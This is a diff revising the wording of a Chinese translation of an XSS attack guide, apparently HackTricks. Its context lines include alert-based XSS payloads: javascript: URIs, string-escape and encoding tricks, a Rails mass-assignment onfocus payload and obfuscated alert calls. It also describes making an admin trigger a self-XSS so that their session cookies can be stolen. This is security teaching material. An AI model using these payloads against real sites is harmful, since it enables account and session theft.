-即使你**无法逃离属性**(`"`被编码或删除),根据**你的值反映在哪个属性**中**如果你控制所有值或只是部分**,你仍然能够利用它。**例如**,如果你控制一个事件如`onclick=`,你将能够在点击时执行任意代码。\
+即使你**无法逃离属性**(`"`被编码或删除),根据**你的值反映在哪个属性**中**如果你控制所有值或只是部分值**,你仍然能够利用它。**例如**,如果你控制一个事件如`onclick=`,你将能够在点击时执行任意代码。\
 另一个有趣的**例子**是属性`href`,你可以使用`javascript:`协议来执行任意代码:**`href="javascript:alert(1)"`**
 
 **使用HTML编码/URL编码绕过事件**
@@ -331,7 +325,7 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
 ```
 **可以注入这些协议的地方**
 
-**一般来说** `javascript:` 协议可以 **在任何接受 `href` 属性的标签中使用**,并且在 **大多数** 接受 **`src` 属性的标签中使用**(但不包括 ``)
+**一般来说** `javascript:` 协议可以 **用于任何接受 `href` 属性的标签**,以及 **大多数** 接受 **`src` 属性的标签**(但不包括 ``)
 ```markup
 
 
@@ -357,17 +351,17 @@ _**在这种情况下,上一节中的HTML编码和Unicode编码技巧在属性
 ```javascript
 
 ```
-此外,还有另一个**好技巧**:**即使你在 `javascript:...` 中的输入被 URL 编码,它在执行之前会被 URL 解码。** 所以,如果你需要使用**单引号**从**字符串**中**逃逸**,并且你看到**它被 URL 编码**,请记住**这没关系,**它将在**执行**时被**解释**为**单引号**。
+此外,还有另一个**不错的技巧**:**即使你在 `javascript:...` 中的输入被 URL 编码,它在执行之前会被 URL 解码。** 所以,如果你需要使用**单引号**从**字符串**中**逃逸**,并且你看到它**被 URL 编码**,请记住**这没关系,**在**执行**时它会被**解释**为**单引号**。
 ```javascript
 '-alert(1)-'
 %27-alert(1)-%27
 
 ```
-注意,如果你尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**,它 **将不会** **工作**,但你可以在 **payload** 中 **混合它们**。
+请注意,如果您尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**,它 **将不会** **工作**,但您可以在 **payload** 中 **混合使用它们**。
 
 **使用 Hex 和 Octal 编码与 `javascript:`**
 
-你可以在 `iframe` 的 `src` 属性中(至少)使用 **Hex** 和 **Octal 编码** 来声明 **HTML 标签以执行 JS**:
+您可以在 `iframe` 的 `src` 属性中(至少)使用 **Hex** 和 **Octal 编码** 来声明 **HTML 标签以执行 JS**:
 ```javascript
 //Encoded: 
 // This WORKS
@@ -436,7 +430,7 @@ onbeforetoggle="alert(2)" />
 
 ### 黑名单绕过
 
-本节中已经揭示了几种使用不同编码的技巧。请**返回学习可以使用的地方:**
+本节中已经揭示了使用不同编码的几种技巧。请**返回学习可以使用的地方:**
 
 - **HTML编码(HTML标签)**
 - **Unicode编码(可以是有效的JS代码):** `\u0061lert(1)`
@@ -458,7 +452,7 @@ onbeforetoggle="alert(2)" />
 
 例如,你可以在元素中添加一些样式,如:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
 
-但是,如果WAF正在过滤样式属性,你可以使用CSS样式小工具,所以如果你发现,例如
+但是,如果WAF正在过滤样式属性,你可以使用CSS小工具,所以如果你发现,例如
 
 > .test {display:block; color: blue; width: 100%\}
 
@@ -482,11 +476,11 @@ onbeforetoggle="alert(2)" />
 ```javascript
 
 ```
-注意,在这个例子中我们**甚至没有关闭单引号**。这是因为**HTML 解析首先由浏览器执行**,这涉及到识别页面元素,包括脚本块。解析 JavaScript 以理解和执行嵌入的脚本是在之后进行的。
+注意,在这个例子中我们**甚至没有关闭单引号**。这是因为**HTML 解析首先由浏览器执行**,这涉及到识别页面元素,包括脚本块。解析 JavaScript 以理解和执行嵌入的脚本仅在之后进行。
 
 ### 在 JS 代码内部
 
-如果 `<>` 被清理,你仍然可以**转义字符串**,在你的输入**所在的位置**并**执行任意 JS**。修复 JS 语法是很重要的,因为如果有任何错误,JS 代码将不会被执行:
+如果 `<>` 被清理,你仍然可以**转义字符串**,在你的输入**所在**的位置**执行任意 JS**。修复 JS 语法是很重要的,因为如果有任何错误,JS 代码将不会被执行:
 ```
 '-alert(document.domain)-'
 ';alert(document.domain)//
@@ -744,21 +738,21 @@ top[8680439..toString(30)](1)
 ````
 ## **DOM 漏洞**
 
-有 **JS 代码** 使用了 **由攻击者控制的不安全数据**,如 `location.href`。攻击者可以利用这一点执行任意的 JS 代码。\
-**由于对** [**DOM 漏洞的解释扩展到此页面**](dom-xss.md)**:**
+有 **JS 代码** 使用 **由攻击者控制的不安全数据**,如 `location.href`。攻击者可以利用这一点执行任意的 JS 代码。\
+**由于对** [**DOM 漏洞的解释扩展,已移至此页面**](dom-xss.md)**:**
 
 {{#ref}}
 dom-xss.md
 {{#endref}}
 
-在这里你会找到关于 **DOM 漏洞是什么、如何引发以及如何利用它们的详细解释**。\
-此外,不要忘记在 **提到的帖子末尾** 你可以找到关于 [**DOM Clobbering 攻击**](dom-xss.md#dom-clobbering) 的解释。
+在那里你会找到关于 **DOM 漏洞是什么、如何引发以及如何利用它们的详细解释**。\
+此外,别忘了在 **提到的帖子末尾** 你可以找到关于 [**DOM Clobbering 攻击**](dom-xss.md#dom-clobbering) 的解释。
 
-### 升级 Self-XSS
+### 升级自我 XSS
 
 ### Cookie XSS
 
-如果你可以通过在 cookie 中发送有效负载来触发 XSS,这通常是一个 self-XSS。然而,如果你发现一个 **易受 XSS 攻击的子域名**,你可以利用这个 XSS 在整个域中注入一个 cookie,从而在主域或其他子域(易受 cookie XSS 攻击的那些)中触发 cookie XSS。为此你可以使用 cookie tossing 攻击:
+如果你可以通过在 cookie 中发送有效负载来触发 XSS,这通常是自我 XSS。然而,如果你发现一个 **易受 XSS 攻击的子域名**,你可以利用这个 XSS 在整个域中注入一个 cookie,从而在主域或其他子域(易受 cookie XSS 攻击的那些)中触发 cookie XSS。为此,你可以使用 cookie tossing 攻击:
 
 {{#ref}}
 ../hacking-with-cookies/cookie-tossing.md
@@ -768,13 +762,13 @@ dom-xss.md
 
 ### 将你的会话发送给管理员
 
-也许用户可以与管理员共享他的个人资料,如果 self XSS 在用户的个人资料中,而管理员访问了它,他将触发该漏洞。
+也许用户可以与管理员共享他的个人资料,如果自我 XSS 在用户的个人资料中,而管理员访问了它,他将触发该漏洞。
 
 ### 会话镜像
 
-如果你发现一些 self XSS,并且网页有 **管理员的会话镜像**,例如允许客户请求帮助,为了帮助你,管理员将看到你在你的会话中看到的内容,但从他的会话中。
+如果你发现一些自我 XSS,并且网页有 **管理员的会话镜像**,例如允许客户请求帮助,为了帮助你,管理员将看到你在你的会话中看到的内容,但从他的会话中。
 
-你可以让 **管理员触发你的 self XSS** 并窃取他的 cookies/会话。
+你可以让 **管理员触发你的自我 XSS** 并窃取他的 cookies/会话。
 
 ## 其他绕过
 
@@ -788,7 +782,7 @@ dom-xss.md
 ```
 ### Ruby-On-Rails 绕过
 
-由于 **RoR 大量赋值**,引号被插入到 HTML 中,然后绕过引号限制,并且可以在标签内添加额外字段 (onfocus)。\
+由于 **RoR 大量赋值**,引号被插入到 HTML 中,然后绕过引号限制,可以在标签内添加额外字段(onfocus)。\
 表单示例 ([来自此报告](https://hackerone.com/reports/709336)),如果您发送有效负载:
 ```
 contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
@@ -833,7 +827,7 @@ document['default'+'View'][`\u0061lert`](3)
 
 如果你发现可以**在302重定向响应中注入头**,你可以尝试**让浏览器执行任意JavaScript**。这**并不简单**,因为现代浏览器在HTTP响应状态码为302时不会解释HTTP响应体,因此仅仅一个跨站脚本有效载荷是无用的。
 
-在[**这份报告**](https://www.gremwell.com/firefox-xss-302)和[**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中,你可以阅读如何在Location头中测试几种协议,并查看其中是否有任何协议允许浏览器检查并执行体内的XSS有效载荷。\
+在[**这份报告**](https://www.gremwell.com/firefox-xss-302)和[**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中,你可以阅读如何测试Location头中的几种协议,并查看其中是否有任何协议允许浏览器检查并执行体内的XSS有效载荷。\
 已知的过去协议:`mailto://`、`//x:1/`、`ws://`、`wss://`、_空Location头_、`resource://`。
 
 ### 仅限字母、数字和点
@@ -846,7 +840,7 @@ document['default'+'View'][`\u0061lert`](3)
 
 > 拒绝从‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx')执行脚本,因为其MIME类型(‘application/octet-stream’)不可执行,并且启用了严格的MIME类型检查。
 
-唯一支持Chrome运行**加载脚本**的**Content-Type**是来自[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)的常量**`kSupportedJavascriptTypes`**中的类型。
+唯一支持Chrome运行**加载脚本**的**Content-Type**是[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)中的常量**`kSupportedJavascriptTypes`**。
 ```c
 const char* const kSupportedJavascriptTypes[] = {
 "application/ecmascript",
@@ -874,7 +868,7 @@ const char* const kSupportedJavascriptTypes[] = {
 ```html
 
 ```
-- **模块**(默认,无需解释)
+- **模块** (默认,无需解释)
 - [**webbundle**](https://web.dev/web-bundles/): Web Bundles 是一个功能,您可以将一堆数据(HTML、CSS、JS…)打包到一个 **`.wbn`** 文件中。
 ```html